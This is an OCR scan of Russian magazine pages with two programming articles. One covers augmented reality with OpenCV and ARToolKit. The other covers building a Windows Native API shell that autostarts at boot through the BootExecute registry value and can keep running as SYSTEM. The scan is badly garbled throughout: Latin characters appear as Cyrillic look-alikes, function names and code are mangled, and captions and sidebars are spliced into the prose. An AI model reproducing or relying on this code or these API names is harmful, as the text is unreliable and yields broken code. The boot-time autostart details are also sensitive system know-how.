жения, положения на карте и прочее, так и вещи куда более сложные. 
К примеру, существует сервис І_ауаг, предоставляющий мобильным 
АП-браузерам информацию об объектах с определенными координа- 
тами. Это позволяет отображать на экране смартфона разнообразные 
подсказки — от названий туристических достопримечательностей до 
объявлений о продаже недвижимости и рейтингах ресторанов, со- 
ставленных их посетителями. Подобный сервисуже больше похожна 
кадры из фантастических фильмов о будущем. 

Второе направление обычно не требует от периферии ничего, 
кроме наличия камеры, полагаясь на технологии распознавания 
изображений. Такие системы не могут решать задачи инфор- 
мационного геоориентирования, обычно они используются в 
локальном пространстве. Расшифровка информации, которую 
несут в себе штрих-коды и бар- коды - их задача, они дополняют 



ѵігіиаі йге$*№д гоот 




Ы ЛЬ і 1Г V 



АК-примерочная в браузере 

изображение товара его стоимостью и другими параметрами. 
Выделение необходимыхтехнологических элементов на изображе- 
нии попадает в этуже нишу. К примеру, подсветка объектов, похожих 
по форме на оружие, или графическая индикация при распознавании 
человеческих лиц в кадре (функция, часто встречающаяся в совре- 
менных фотоаппаратах). Все это, безусловно, тоже АР. 

В киноиндустрии и сфере развлечений применяется реконструкция 
трехмерных координат опорных маркеров с целью дополнения изо- 
бражения виртуальными объектами, привязанными кэтим координа- 
там. 

Так как найти компьютер с веб-камерой или просто несколько файлов 
с подходящими фотографиями сегодня не представляет никакого 
труда, то дальше мы будем вести речь о создании систем дополненной 
реальности «второго направления». 

Ноѵѵ тасіе 

В основе любого АР-приложения, использующего анализ поступаю- 
щей с камеры картинки, безусловно, лежитсистема компьютерного 
зрения. Можно создавать та кую систему самому, но проще взять 
готовую. Одной из наиболее известных библиотек, реализующих по- 
добный функционал, является ОрепСѴ (Ореп Эоигсе Сопприіег Ѵізіоп 
ЫЬгагу — библиотека компьютерного зрения с открытым исходным 
кодом). Это весьма серьезный фреймворк. В первую очередь он 
предоставляет РТІ_ в виде типов, базовых примитивов, математиче- 
ских и конфигурационныхутилит. Затем — средства пост-обработки 
изображений, не сильноуступающие по возможностям графическим 
редакторам; непосредственно сами алгоритмы компьютерного 
зрения, позволяющие выделять на изображении геометрические 
объекты и работать с ними; а также высокоуровневые обвязки для 
доступа к камере, отображения 61Л и прочего. Ну и на закуску — би- 
блиотека хорошо документирована и имеет крайне демократичную 
ВЭй-лицензию. Список платформ, где работает ОрепСѴ, также весьма 
радует — это как минимум ѴѴі псіоѵѵз, Ыпих, РгееВЭО и МасОЭХ. 

Первое ОрепСѴ-приложение 

Вот и настало время приступить к написанию приложения с исполь- 
зованием ОрепСѴ. Наше первое приложение будет искать четыреху- 
гольный базис маркера на заданной картинке, чтобы потом (в теории) 
передать его на дальнейшую обработку. На этом простом примере мы 
разберем основные функции и правила построения вызовов. 

В первую очередь нам нужна картинка, с которой мы будем работать. 
Картинки в ОрепСѴлибо создаются пустыми с помощью функции 
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сѵСгеаІеІтаде, либо загружаются из файлов с помощью 
сѵІ_оасІІ гладе, либо копируются изуказателей на уже 
существующие изображения с помощью сѵСІопеІппаде. 
Когда ресурсы, выделенные под хранение изображения, 
больше не нужны, необходимо освободить ихс помощью 
вызова сѵРеІеазеІтаде. Мы будем загружать первичное 
изображение из файла: 



Ір1Іта§е *іт§_огі§ = сѵІ_оасІІта§е( "іта§е . ]'р§" ) ; 

Чтобы контролировать процесс, будем отображать 
каждый этап на экране и ожидать нажатия клавиши, 
прежде чем перейти к следующему. Для отображения нам 
необходимо окно, котороетоже придется создать. Окна в 
ОрепСѴ адресуются по символьным именам. Своеобраз- 
но, ножить можно. 



сѵМатесІІл(іпсІоы( "ХаКеР ОрепСѴ ІлІіпсІоы'Ч 
СѴ_МІШ0Ы_АІІТ05І2Е) ; 

сѵ5боыІта§е( "ХаКеР ОрепСѴ ІлІіпсІоы'Ч іт§_огі§); 
сѵІлІаі1:Кеу(Ѳ) ; 

Далее необходимо сделать препроцессингизображе- 
ния, чтобы подготовить его к поиску контуров. Я выбрал 
алгоритм, состоящий изтрех шагов. Сначала мы просто 
обесцвечиваем изображение. Если бы у нас стояла зада- 
ча искать прямоугольник какого-то определенного цвета, 
то вместо этого пришлось бы делать выделение цветового 
канала. Вторым шагом мы делаем эквалайзинг гисто- 
граммы изображения, чтобы заполнить всю яркостную 
шкалу итаким образом исправить слишкомтемное (либо 
наоборот, пересвеченное) изображение. И, наконец, мы 
делаем пороговую бинаризацию — все, что темнее 50%, 
становится черным, а все, что светлее - белым. Так как 
у нас 8-битная шкала, то это будут границы 0-127-255. 
Основные моменты кода за пропуском несущественных 
деталей будут выглядеть в от так: 

сѵСѵ1:Со1ог(іт§_огі§, іт§_§гау^ СѴ_КСВ2СКАѴ) ; 
сѵЕдиа1І2еНІ5І:(іт§_§гау^ іт§_ІіІ5І:) ; 




Синтез ЗО-объектов по АК-маркерам 




Подсветка лица в кадре — тоже АР 



сѵТІіге5Ііо1сІ(іт§_ІіІ5І:, іт§_1:1іг, 127., 255, 
СѴ_ТНКЕ5Н_ВІМАКѴ); 

Ір1Іта§е *іт§_1:Ііг_Ькр = сѵС1опеІта§е(іт§_1:Ііп) ; 

В конце я создаю бэкап картинки, так какона понадобится 
мне позже, но исходный вариант«испортится» в процессе 
поиска контуров. Теперь, когда препроцессинг проведен, 
можно приступить непосредственно коконтуриванию. 

Тут стоит обратить внимание на то, что связный список, 
в котором хранятся контуры, относится к примитивам, 
находящимся в специальных пулах памяти (в одном пуле 
может быть больше одного примитива), и эти пулы не- 
обходимо создавать, а потом, при ненадобности, удалять. 
В принципе, это удобно, так как позволяет реализовать 
концепцию сборки мусора. 

СѵМет51:ога§е *5І:опа§е = сѵСгеа1:еМет51:ога§е(0) ; 
СѵБед *соп1:оиг5 = І\ІШ_І_; 

сѵРіпсІСоп1:оип5(іт§_1:Ііг , 5І:ога§е, &соп1:оиг5); 

Получив список контуров, нужно его отфильтровать. 
Сначала мы проводим аппроксимацию с необходимой 
точностью (я взял 2% отклонения), чтобы учитывать только 
резкие углы, а не каждый незначительный изгиб. Следую- 
щим шагом мы проверяем, что аппроксимированный кон- 
тур имеет четыре угла, достаточную площадь и является 
выпуклым многоугольником. Если контур удовлетворяет 
условию, мы рисуем его на исходном изображении: 

ыііііе (сопѣоигз) { 

СѵБед *гези11: = сѵАрргохРо1у( . . . 

сѵСоп1:оигРегіте1:ег(соп1:оиг5)*Ѳ.Ѳ2 . . .); 
(гевиіі:- >1:о1:а1==4 && сѵСоп1;оигАгеа(пе5и11:) 
>= 100 && сѵСбескСоп1:оипСопѵехі1:у(ге5и11:) ) 

{ 

сѵйгаыСоп1:оиг5(іт§_огі§, пеБиІІ:, ...); 

Также я хочу реконструировать изображения найденных 
(потенциально) маркеров, рассчитав им матрицы аффин- 
ных преобразований и создав новые картинки посред- 
ством применения этих матриц. Применять их, кстати, я 
буду к тому самому бэкапу, сделанному в самом начале. В 
качестве расчетныхзначений мы возьмем координаты 




Приложения 
АидтепЩб ВеаІЛу 
не ограничиваются 
развлекательным 
сектором: к примеру, 
на ОрепСѴ построены 
очень многие интел- 
лектуальные системы 
видеонаблюдения в 
сфере безопасности. 




> СІѴСІ 

На диске ты найдешь 
исходные коды опи- 
сываемых примеров, 
а также последние 
версии ОрепСѴ и 
АВТооІкіТ 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

• Здесь живет 
ОрепСѴ: 

Ьир://доо.дІ/Егд2Е 

• Неплохая подборка 
уроков по ОрепСѴ: 
ЬЦр://доо.д[/Е525М . 

• Страничка 
АВТооІкіЕ Ыи.ѵѵазЬ- 
іпдІоп.есІи/аНооІкіІ: . 

• Сервис Еауаг: 

Іауагсопп . 
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Поиск маркера с помощью ОрепСѴ 



четырехугольника, прошедшего проверку, и новой квадратной кар- 
тинки 200x200, назвав ихзгсОиасІ и сІзШиасІ соответственно: 

СѵМаІ: *магр_та1: = суСгеа1:еМа1:(3, З у СѴ_32РС1); 
сѵСе1:Рег5рес1:іѵеТгап5-Рогт(5гс(2иасІ., сІ5І:(2иасІ, ыагр_та1:); 
Ір1Іта§е* тгк = сѵСгеа1:еІта§е(сѵ5І2е(200, 200), 8., 1); 
сѵМагрРег5рес1:іѵе(іт§_1:Ііг_Ькр., тгк, ыагр_та1:); 



і. 



Кгіге геашгйя 

ШН<*Ф 



(а) (Ь) (с) (<і) 



2. Пне Геаіигсз 



I III II- 



(а) <Ь) (О (4> 



1 




3. ГйіІег’Шггйиіиі Ісаіигел 




4. ЗресілІ сііп^опаі Ііпе Геліиге імвді Іп [3,4,5] 

0 



Элементы, применяемые при поиске объектов 



Получившиеся картинки я сохраню в массиве, а позже покажу на 
экране. Вот, в принципе, и все. Результат работы этой небольшой про- 
граммки можноувидеть на иллюстрации. Я считаю, что для ужасного 
качества исходного изображения результат превосходен — мы нашли 
и реконструировали наш маркер с лямбдой. 

Гюльчатай, открой личико 

Анализ найденного контура на предметтого, является ли он выпуклым 
четырехугольником — дело немудреное. Но поисклица или челове- 
ческой фигуры такими алгоритмами сделать нереально, тут нужен 
системный подход и математическая теория. Традиционно для поиска 
сложных объектов на изображении пользуются так называемыми 
каскадами Хаара. Они названы в честь венгерского математика Аль- 
фреда Хаара, придумавшего дискретные вейвлет-преобразования, 
использующиеся в данном алгоритме. 

Если вкратце, то производится поиск шаблонов, описанных специфи- 
ческими примитивами. Сначала ищется грубый шаблон, состоящий 
из небольшого количества элементов, после чего каждый элемент 
сравнивается с необходимым набором уже более мелкихэлемен- 
тов, и такдо полного совпадения. Подобная рекурсия и называется 
«каскадами». 

ОрепСѴ предоставляет необходимые инструменты для работы с каска- 
дами Хаара и даже содержит несколько уже обученных классификато- 
ров — в основном это части человеческого тела. Сейчас мы напишем 
небольшую программу, которая, пользуясьзаданным классификато- 
ром, будет отмечать на изображении найденные объекты. 

Я произвожу предварительную обработку исходного изображения, 
чтобы облегчить работу классификатору. Эта обработка заключа- 
ется в обесцвечивании и эквалайзинге гистограммы. Процедура 
аналогична описанной ранее, поэтому не будем заострять на ней 
внимание. Если картинка слишком большая, то неплохо бы ееумень- 
шить, чтобы время поиска не было слишком большим (я пренебрег 
этим моментом). После чего нам необходимо загрузить один изуже 
обученных каскадных классификаторов, поставляемых вместе с 
библиоте КОЙ: 

СѵНаагС1а55І1іепСа5сасІе *савсасІе=(СѵНаагС1а55І1іегСа5сасІе*) 
сѵІоасІ( ,, /и5г/5баге/орепсѵ/Ііаагса5сасІе5/Ііаагса5сасІе_ 
-Ргоп1:а1-Расе_сІе-Раи11: . хті " ) ; 

Теперь можно переходить непосредственно к поиску. Обращаютвое 
внимание, что результатом поиска будетявляться связный список 
прямоугольников, который хранится в пуле памяти, так что этот пул 
надо не забыть создать, а затем очистить. По окончании поиска мы 



производим перебор всех найденных прямоугольников, и рисуем их 
на исходной картинке: 

СѵБед *Тасе5 = сѵНааг0е1:ес1:0Ь]ес1:5 (іт§_§гау, сазсасіе, 
5І:ога§е) ; 

Тог (зІ 2 е_ 1 : і=0; ікТасез- >То1:а1; ++і) { 

СѵКесІ: *г = (СѵКесІ:*) сѵ6е1:5едЕ1ет(-Расе5 , і); 
сѵКес1:ап§1е(іт§, сѵРоіп1:(г->х, г->у)^ 
сѵРоіп1:(г->х + г->ыісІ1:Іі^ г->у + г- >Тіеі§Ы: ) ) ; 

} 

После этого остается только создать окно и отобразить в нем исходную 
картинку, разрисованную прямоугольниками. Какэто сделать, я опи- 
сал ранее. Помимо пользования уже готовыми, обученными каскад- 
ными классификаторами, можно обучать и свои — ОрепСѴ предостав- 
ляет для этого необходимый набор средств. К сожалению, это весьма 
объемная тема, выходящая за рамки данной статьи. 

АКТооІк* 

Библиотека ОрепСѴ, безусловно, предоставляет достаточное количе- 
ство низкоуровневых возможностей и оченьхороша для извлечения 
максимума информации из изображения. Но иногда требуется быстро 
и качественно найти в кадре ограниченный наборзаранее известных 
объектов. Именно этой задачей в 1 999 году заинтересовался японец 
Хироказу Като, профессор научно-технического института Нары. 
Совместно с лабораторией НІТ университета Вашингтона он выпустил 
библиотеку, названную АРТооІкіТ Основная задача этой библиотеки 
— отслеживание в кадрезаранее известных квадратных маркеров 
и реконструкция их расположения в пространстве относительно 
камеры. Эти данные позволяют рассчитывать трехмерные коорди- 
наты элементов, отрисовываемых поверх кадра с привязкой кэтим 
самым маркерам. Таким образом создается интерфейс дополненной 
реальности. 

Библиотека заточена под координатное пространство ОрепбБ, что 
крайне удобно. Также поддерживается работа с захватом видео, 
тонкой калибровкой камер, обучению работе со своими маркерами и 
прочие необходимыеутилитарные механизмы. 

Библиотека предоставляет крайне гибкое АРІ, позволяющее вести 
как высокоуровневое крупноблочное моделирование, буквально 
в несколько строк, та к и тонкую настройку каждого алгоритма при 
необходимости реализации нестандартных решений. Проект очень 
популярен, лежит в основе более чем десяти библиотек, развиваю- 
щих его идеологию, и портирован в том или ином виде даже на такие 
нецелевые платформы, как ЕІазЬ и 5іІѵегІ_ідЫ. 
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Наша программа — только АКТооІкН- и никакого 
мошенничества 




Объекты, найденные раз- 
ными классификаторами 




Первый каскад при поиске 
лица 




ІІКІ. сайта журнала в виде 
ОР-кода 



После этого нужно запустить основной цикл АПТооІкіРа, который 
инициализируется тремя саІІЬаск’ами, первый — для передачи 
событий с мышки, его мы реализовать не будем и оставим пустым 
второй — для событий с клавиатуры (я реализовал там выход при 
нажатии Е5С), и третий — основная функция, в которой и будет 
происходить обработка изображения: 

аг§МаіпІ_оор(І\ІІЛ_І_., кеуРипс., таіпРипс); 



Используем АВТооІкіі 
на практике 

Думаю, настало время написать свое приложение, использую- 
щее АРТооІкіЕ В комплекте с библиотекой идут шаблоны четырех 
тестовых маркеров — Ніго, Кащі, Затріеі и 5атр1е2; рбГки для 
печати можно найти в каталоге раііегпз. Маркер Затріеі у нас 
будет являться платформой для синего куба, Ніго — для красного 
шара, а остальные два не будут являться ничем, мы не будем их 
обрабатывать. В качестве фреймворка для 0реп6І_ используем 
ОШТ, с его инициализации и начнем: 



В функции таіпРипс и происходит основное шаманство. Сначала 
мы берем кадр с камеры и выводим его на экран. Потом ищем на 
нем маркеры и сличаем дескрипторы найденных с теми, что мы 
загрузили в самом начале: 

АКІІіп1:8 *-Ргате = ( АКІІі п1:8 *)агѴісІеоСе1:Іта§е( ) ; 

аг§0І5рІта§е(-Ргате, 0 3 0); 

агйе1:ес1:Магкег(-Ргате., 100., &тгк_іп-Ро., &тгк_соип1:) ; 

■Рог ( і=0; і<тгк_соип1:; ++і) 

(тгк1_ісІ==тгк_іп-Ро[і] . ісі ) іпс!ех=і; 



§1и1:Іпі1:(&аг§с , аг§ѵ); 

Теперь можно запускать подсистемы АРТооІкіСа. Начнем с видео: 
откроем видеокамеру, загрузим стандартные настройки для нее, 
узнаем разрешение, инициализируем его размерами подсистемы 
камеры и ОШ, запустим захват кадров: 

агVісIеоОреп( ,, "); 

агѴісІеоІпр5І2е(&-Рпате_ыісІ1:Іі 3 &-Ргате_Неі§ІгЬ) ; 
агРагатІ_оасІ( ,, 0а1:а/сатега_рага .сІаТ'П 1 , &рагат1); 
агРагатСНап§е5І2е(&рагат1, Тгате_ыісІ1:Іі і 
^гате_Ііеі§ІтЩ &рагат2); 
агІпі1:Срагат(&рапат2) ; // ЫеЬсат 
аг§Іпі1:(&рагат2., 1.0,, 0 , 0 , 0 , 0); // СШ 

В каталоге Ьіп/Оаіа лежат файлы с данными тестовых маркеров, их 
нужно загрузить и получить дескрипторы для дальнейшей работы. На 
самом деле можно пользоваться не только тестовыми маркерами, на 
шаблоне ЫапкРаП.дТлегко нарисовать любой маркер и оцифровать 
его с помощью утилиты тк_раи, идущей в комплекте с библиотекой. 

тгк1_ісІ = агІ_оасІРа1:1:( "Оаііа/раіі: . затріеі" ) ; 
тгк2_ісІ = агІ_оасІРа1:1:( "Оаііа/раіі: . біго" ) ; 



Теперь самое интересное. По найденному маркеру мы можем рас- 
считать матрицутрансформации для ОрепОІ_. 

После применения этой матрицы нужные параметры смещений, 
поворотов и масштабирования настроятся таким образом, что начало 
координат окажется прямо в центре нашего маркера. Все нарисо- 
ванное будет вполне натурально спроецировано поверх кадра и 
окажется на своем месте: 

агСе1:Тгап5Ма1:(&тгк_іпТо[іпсІех] ., тгк1_сеп1:ег., 
гк1_ыісІ1:Іі ., тгк1_1:гап5) ; 
аг§Сопѵ61рага(тгк1_1:гап5 л §1_рага) ; 
§1Ма1:гіхМо<Зе(61_тОЕІѴІЕІлІ) ; 

§1І_оасІМа1:гіхсІ(§1_рага); 

§1и1:5о1ісІСиЬе(50. 0) ; 

Заключение 

Надеюсь, мне удалось наглядно показать, что для того, чтобы на- 
чать разрабатывать системы Аидтепіеб Пеаіііу, вполне достаточ- 
но твоего старенького ноутбука со встроенной веб- камерой. Би- 
блиотеки ОрепСѴ и АРТооІкіІ к твоим услугам, тебе осталось только 
самое простое и приятное — написать мегасофтину с интерфейсом 
будущего : ) . ін: 
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СООІЫО 




ШЕЛЛ ДЛЯ СИНЕГО 
ЭКРАНА 

Изучаем программирование на Иаііѵе АРІ 
на примере шелла 

о Если программе проверки диска требуется исправить ошибки 
системного раздела, который не может быть отключен во время 
работы ѴѴіпсІоѵѵз, после перезагрузки программа запускается до 
открытия окна логина, отображая белые буквы на синем экране. 
Зто - особый режим работы ѴѴіпсІоѵѵз, в котором еще не работает 
подсистема ѴѴіп32, зато есть полный доступ к файлам и реестру. 



Загрузочный экран 

В ѴѴіпсІоѵѵз ХР та кой режим работы выглядит каксиний экран с логоти- 
пом в верхнем правом углу, в ѴѴіпсІоѵѵз 2003 цветэтого экрана серый, 
в Ѵізіа и ѴѴіпсІоѵѵз 7 — черный. Самое частое приложение, которое 
ты можешь наблюдать работающим в этом режиме, это программа 
проверки диска. Обычно диск проверяется консольной программой 
сбксізк.ехе. Но в загрузочном экране стартует вовсе не оно, как можно 
было бы подумать, а аіЛосбк.ехе — приложение, написанное на 
чистом ІМабѵе АРІ. Только такие программы способны запуститься до 
загрузки подсистемы ѴѴіп32. 

Неплохо было бы написать шелл, командную строку для экспери- 
ментов, чтобы побродить по системе еще до ее полной загрузки, с 
возможностью редактировать файлы и реестр. Я загорелся этой идеей 
и занялся разработкой такого шелла. Первая версия программы была 



написана с использованием библиотеки ХепѴѴіпХ, позже я изучил 
исходный код шелла І\ІСІ_І из проекта ТіпуКРІ\ІІ_ и решил строить 
свой собственный шелл на его основе. Отиспользования ХепѴѴіпХя 
отказался, но часть исходного кода оттуда, связанная с обработкой 
клавиатурных комбинаций, перекочевала в новую версию, чтобы 
правильнее, чем в І\ІСІ_І, реализовать работу с клавиатурой. В част- 
ности, І\ІСІ_І даже не поддерживал переключение регистра символов 
по клавише 5ЫИ Кнабору команд, доступных в І\ІСІ_І, добавились 
команды, написанные мной. Так получилась программа, которую я 
назвал ІМабѵе 5ЬеІІ. 

Программирование 

Программы, которые могут за пускаться из «синего экрана», — это 
пабѵе-приложения, то есть такие приложения, которым доступны 
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Сборка приложения в \МЖ 



Ключи запуска 



Автозапуск пабѵе-приложений задается в ветке реестра НКЕУ_Ш- 
САІ_МАСНІМЕ\СиггепіСоп1:го15еДСоп1:гоІ\Зе55Іоп Мападег. Здесь 
есть два ключа, позволяющих запустить приложение на этапе 
загрузки системы. Обычно присутствует только один из них, 
ВооіЕхесиІе. Это мультистроковый параметр, содержащий строку 
«аиФсЬеск аиФсЬк *». После нее можно добавить свою команду 
запуска. Например, можно поместить пабѵе.ехе в папку %зуз- 
Іетгоо1:%\5у5І:ет32, а в ВооіЕхесиІе прописать строку «пабѵе». В 
результате пабѵе.ехе запустится сразу после аіЛосЬк.ехе при запуске 
системы. Здесь же можно указать командную строку процесса, 
например «пабѵе зоте-соттапб». 

Чтобы запустить программу из любого каталога системы, нужно 
указать полный путь к исполняемому файлу без І\ІТ- префикса, то 
есть в обычном формате (например, СЛітрѴіабѵе.ехе). При указании 
имени пабѵе-приложения кроме идентификатора аФосНеск 
(используется при указании аиіосНк в этом списке) возможны 
идентификаторы азупс и бебид. Идентификатор бебид приводит к 
установке РгосеззРагатеФгз -> БеЬидЕІадз = ТЕБЕ. Идентификатор 
азупс приводит к тому, что система не ожидает завершения 
запускаемого процесса, и оно продолжает работать, а система в это 
время продолжает загрузку. В результате получается приложение, 
работающее в живой системе, отображающееся в диспетчере задач 
как запущенное от имени пользователя 5У5ТЕМ. 

Второй ключ реестра, через который возможен запуск, носит 
название ЭеФрЕхесФе и полностью аналогичен ВооіЕхесФе. 
Разница между ними в том, что запуск из этих ключей происходит 
на разных этапах инициализации системы. На этапе запуска 
из ЭеФрЕхесФе в системе уже создан файл подкачки и 
инициализированы переменные среды, а на этапе ВооіЕхесФе еще 
нет. 



только функции І\ІТ ІЧаІіѵе АРІ, экспортируемые библиотекой піб 11.611. 
Это набор функций, выполняющихся в режиме ядра, которые можно 
вызывать из пользовательского режима. Библиотека экспортирует 
два набора функций — с одинаковыми названиями, но разными пре- 
фиксами: «2ѵѵ» и «N1». Функции с префиксом «Хѵѵ» предназначены 
для прямого вызова из режима ядра (например, из драйверов), а 
функции с префиксом N1 — из пользовательского режима (из прило- 
жений). При вызове функции с префиксом «N1» в итоге выполняется 
тотже код, что и при использовании префикса Хѵѵ, но при этом перед 
исполнением кода параметры функции проходят дополнительную 
проверку, так каксточки зрения системы пользовательский режим — 
это ненадежный источник входных данных. 

Вообще, при программировании ІЧаІіѵе-приложений следуетиметь в 
виду, что почти никаких готовых или заданных поумолчанию возмож- 
ностей в этом режиме нет, разве что вывод букв на экран реализуется 
сравнительно просто. Все остальные операции, будьто ввод с кла- 



Ыаііѵе 5ЬеІІ в ѴѴіпсІоѵѵ$ ХР 




> СІѴСІ 

На диске тебя ждет 
ІМабѵе ЗЬеІІ 0.12 



ѵѵш 



• Сайт Томаша Новака. Удобный справочник, содержащий описания 
функций и типов данных, разбитый на категории: 

пііпіегпаіз.пеі. 

• М5БІЧ. Неполная документация по функциям ФсШ.сІІІ доступна в 
Місгобой Беѵеіорегз ІЧеЕ/ѵогк в разделе о ѴѴіпсІоѵѵз Бгіѵег КіЕ 

тісгозоФсоіті. 

• ІЧабѵе ЭЬеІІ. Командная строка для паііѵе- режима от автора статьи: 
Ьех.рр.иа/Ф-пабѵе-аррІісабопз-зЬеІІрЬр. 

• Исходные коды РеасЮЗ — свободной альтернативы ѴѴіпсІоѵѵз. 

Редкая возможность не только увидеть множество примеров 
использования ІЧабѵе АРІ функций, но и заглянуть немного дальше — 
в их внутреннее устройство: бѵп оз. 

• Библиотека ХепѴѴіпХ, упрощающая программирование в пабѵе- 
режиме: /еп\л пх.зоигсеФгде.пеЕ 

• ІЧабѵе Беѵеіортепі: Кіѣ (ІЧБК) от Алекса Ионеску. Набор 
заголовочных файлов, содержащих все типы и функции ІЧабѵе АРІ: 
собе.доодІе.сот/р/пабѵе-пМооІкіІ:. 



виатуры или установка текущего рабочего каталога, не говоря уж об 
остальном, реализуется непосредственно самой программой. 

ІМаІіѵе АРІ непривычен и не слишком удобен для использования, но 
другие АРІ недоступны. Если в программировании с использовани- 
ем ѴѴіпАРІ для какого-то действ и я требуется одна-две функции, то в 
ІЧабѵе АРІ, возможно, потребуется пять-шесть. Это и неудивительно, 
ведь каждый вызов ѴѴіпАРІ внутри реализуется как раз вызовом не- 
скольких функций из пісНШИ 

Настройка проекта 

Для написания собственного паііѵе-приложения понадобится до- 
кументация, среда разработки и заголовочные файлы Ыаііѵе АРІ. 
Функции І\ІТ ІЧаІіѵе АРІ частично документированы в М5БІЧ. Однако 
там описано далеко не все, что имеется в пФфтакчто информацию 
следует по возможности искать в других источниках. 

В качестве среды разработки может выступить любой редактор кода, 
а компиляция паііѵе-приложения будет производиться утилитой ЬшШ 
из ѴѴіпсІоѵѵз Бгіѵег Кіртакчто его придется установить себе на машину. 
ѴѴБ К используется для разработки драйверов, но способен также ком- 
пилировать паііѵе-приложения. 

Проект приложения в ѴѴБ К выглядит как каталог, где лежат файлы 
исходного кода, рядом с которыми расположен файл конфигурации 
проекта под именем 50БРСЕ8. Так может выглядеть простой паііѵе- 
проект: 

ТАКСЕТІ\ІАМЕ=паѣіѵе 

ТАКСЕТТѴРЕ=РКОСКАМ 

11МТУРЕ=пЕ 

ІЫСШ0Е5=$(00К_ІІ\ІС_РАТН) 

501ІКСЕ5=паѣіѵе . с 
РКЕСОМРІІ_ЕО_ІІ\ІСІ_ІЮЕ=ргесотр. б 
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ПРИЛОЖЕНИЯ ПОЛЬЗОВАТЕЛЬСКОГО РЕЖИМА 



Так выглядел загрузочный режим до ѴУ/іпсІоѵѵз ХР 



Подсистемы ѴУіпсІоѵѵз 



Он отредактирован так, чтобы в результате компиляции собирался 
не драйвер, а пабѵе-приложение. Для этого параметру ТАРОЕТТУРЕ 
задано значение «РР06РАМ», чтобы собиралась программа, а пара- 
метру ІІМТѴРЕ задано значение «пі» , для того, чтобы тип приложения 
был пабѵе. 

Сборка программы осуществляется командой ЬшШ, набранной в 
командной строке Виіісі Епѵігоптепі: ѴѴйК. Перед сборкой следует 
скачать заголовочные файлы ЫйК (Ыабѵе ІЧТТооІкіІ:), так как стан- 
дартных хидеров из Ѵ\ШК недостаточно, чтобы использовать все 
существующие функции ЫабѵеАРІ. Каталог пбк следует распаковать в 
папку, содержащую заголовочные файлы ѴѴйК, и прописать к ней путь 
в файле Ьіп/зеІепѵ.ЬаІ (в строке «іпс1ибе=»). 

Результатом сборки проекта будет .ехе-файл приложения. Но это 
не обычный экзешник, так просто запустить его не получится. В 
РЕ-заголовке ехе-файла есть специальное поле, означающее под- 
систему, в которой выполняется приложение. У паііѵе-приложений 
в это поле установлено значение 0x01 , означающее, что .ехе не 
требует подсистемы. У обычных приложений там содержится 
значение, соответствующее подсистемам «ѴѴіпбоѵѵз 61)1» (0x02) или 
«ѴѴіпОоѵѵб сопзоіе» (0x03). Из-за отличающегося значения этого 
поля Ыаііѵе-приложения не запускаются в обычном режиме работы 
ѴѴіпбоѵѵз. При попытке запустить программу ѴѴіпбоѵѵз выдает со- 
общение «Приложение нельзя запустить в режиме ѴѴ і п 3 2 » . Запуск 
скомпилированного приложения в системе следует производить 
через прописывание его в ключ реестра ВооіЕхесиІе. Отлаживать 
приложение лучше на виртуальной машине, во-первых, из сооб- 
ражений удобства, а во-вторых, из соображений безопасности. По- 
скольку прописанное в ВооіЕхесиІе приложение запускается даже 
в «безопасном режиме» работы системы, ошибка в приложении 
может привести к невозможности нормальной загрузки ѴѴіпсІоѵѵз. В 
«безопасном режиме» будет показываться черный экран, но при- 
ложение будет работать, не имея при этом возможности вывести 
текст на дисплей. 

Обработка команд 

Шелл загрузочного экрана должен вести себя точнотакже, каки шелл 
для любой другой среды, то есть воспринимать команды, набранные 
с клавиатуры, и выводить на экран результаты исполнения команд 
в текстовом виде. Чтобы шелл мог воспринимать ввод, он должен 
самостоятельно получить скан-коды с клавиатуры и преобразовать их 
в коды символов. 

Для чтения с клавиатуры необходимо с помощью функции 
ЖСгеаІеЕіІе открыть устройство клавиатуры какфайл. Имя файла при 
этом будет выглядеть как«\Оеѵісе\КеубоагсІСІа550». 

НАШЬЕ бОгіѵег; 

1ШССЮЕ_5ТК]Ж Ргіѵег; 



ОВЗЕСТ_АТТКІВІІТЕ5 0Ь]ес*А«гл.Ьи1:е5; 

ІО_5ТАТи5_ВІ_ОСК ІозЬ; 

К1:1Іпі1:ипісогіе51:гіп§(8Югіѵещ ^ ,, \\^еѵісе\\КеуЬоапсIС1а550 ,, ) ; 
Іпі1:іа1І2еОЬзес1:А1:1:піЬи1:е5(&ОЬзес1:А1:1:гіЬи1:е5, &Опіѵег^ 
ОВЗ_СА5Е_ІМ5ЕМ5ІТІѴЕ , І\ІШ_Щ І\ІІЛ_І_); 

^Сгеа1:еРі1е(&бОгіѵег, БѴІЧСНКОІЧІІЕ | 6ЕМЕКІС_КЕА0 | 
РІІ_Е_КЕА0_АТТКІВІЯЕ5, 

&0Ьіес*А«гіЬи*е5, &ІозЬ, І\ІІЛ_Щ РІІЕ_АТТКІВиТЕ_ШКМАЩ 
0, РІІ_Е_ОРЕ^ РІІ_Е_ОІКЕСТСЖУ_РІІ_Е, МЦИ, 0); 

Параллельно нужно создать событие (объектядра типа ЕѵепД, которое 
будет использоваться для ожидания ввода символов. 

Іпі1:іа1І2е0Ь]ес1:А1:1:піЬи1:е5(&0Ь]ес1:А1:1:піЬи1:е5, 

МЦИ, 0, МЦИ, І\ІШ_І_); 

Ш:Сгеа1:еЕѵеп1:(&ІіЕѵеп1:, ЕѴЕМТ_АИ_АССЕ55 Л 
&0Ь]'ес1:А1:1:гіЬи1:е5^ 1, 0); 

Чтение с клавиатуры осуществляется функцией ЖРеасІЕіІе, которой в 
параметрах переданы хэндл клавиатуры и хэндл события. 

ІО_5ТАТи5_ВІ_ОСК ІозЬ; 

І_АКСЕ_^ТЕСЕК ВуІіеО-р-РзеІ: = 0; 

МТБТАТиБ Б'Ра'Риз; 

К1:12егоМетогу(&1о5Ь., зігео- (ІозЬ)); 

Бѣаішз = М1:КеасІРі1е(ІіОгіѵег ^ М Еѵепі: „ МІЛ Ь ^ N^^^^ &ІозЬ, 
Ви-р-Рещ *Ви-р-Рег5І2е, ЯгВуРеО-р-Рзе-Щ N1111); 

Следует проанализировать возвращаемоезначение функции и 
при необходимости подождать наступления события с помощью 
І\ІіѴѴаііЕог5іпдІеОЬ)есІ. 

і-Р (Бііаііиз == 5ТАТІІ5_РЕМОІМС) 

{ 

Б1:а1:и5 = М:Маі1:Рог5іп§1еОЬзес1:(ЬЕѵеп1:., ТКІІЕ, N1111); 

} 

ЖРеасІЕіІе вернет данные в виде структуры КЕУВОАРП_1ЫР11Т_ПАТА. 
Эта структура имеет следующий формат: 

Ѣуресіе-Р з-Ьгис-Ь _КЕУВОАКО_^РІІТ_ОАТА { 

